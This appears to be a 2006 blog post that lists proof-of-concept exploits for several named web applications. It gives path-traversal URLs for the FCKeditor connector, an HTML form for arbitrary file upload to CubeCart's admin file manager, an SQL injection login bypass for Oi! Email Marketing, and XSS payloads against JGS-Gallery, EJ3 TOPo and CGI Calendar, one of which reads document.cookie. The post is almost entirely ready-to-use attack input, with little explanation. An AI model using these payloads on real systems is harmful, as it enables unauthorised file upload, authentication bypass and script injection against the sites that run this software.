ecoestadistica.com

Tuesday, February 28, 2006

Vulnerabilities...

FCKeditor 2.0 FC

Proof of Concept:

http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAME

---------------------------------------------------------------------------------------------------

CubeCart 3.0.0 – 3.0.6

Exploit:
<form action="http://host/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload

<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>

-------------------------------------------------------------------------------------------------

Oi! Email Marketing 3.0 SQL Injection

Proof of Concept:

http://www.site.com/oi/index.php

Username : username' OR '

Password : ' OR '

-------------------------------------------------------------------------------------------------

Woltlab Burning Board 2.x (JGS-Gallery MOD <= 4.0) multiple XSS

Proof of Concept:

GET -> http://site/jgs_galerie_slideshow.php?sid=&katid=&userid=XSS
EXAMPLE -> http://site/jgs_galerie_slideshow.php?sid=&katid=&userid=<script>alert('X');</script>
GET -> http://site/jgs_galerie_scroll.php?userid=XSS
EXAMPLE -> http://site/jgs_galerie_scroll.php?userid=<script>alert('X');</script>
GET -> http://site/jgs_galerie_slideshow.php?sid=&katid=XSS&userid=
EXAMPLE -> http://site/jgs_galerie_slideshow.php?sid=&katid=<script>alert('X');</script>&userid=

-------------------------------------------------------------------------------------------------

EJ3 TOPo Cross Site Scripting Vulnerability

Proof of Concept:
Access /code/inc_header.php like this:
inc_header.php?gTopNombre="><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------------------------

CGI Calendar XSS Vulnerability

Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

-------------------------------------------------------------------------------------------------



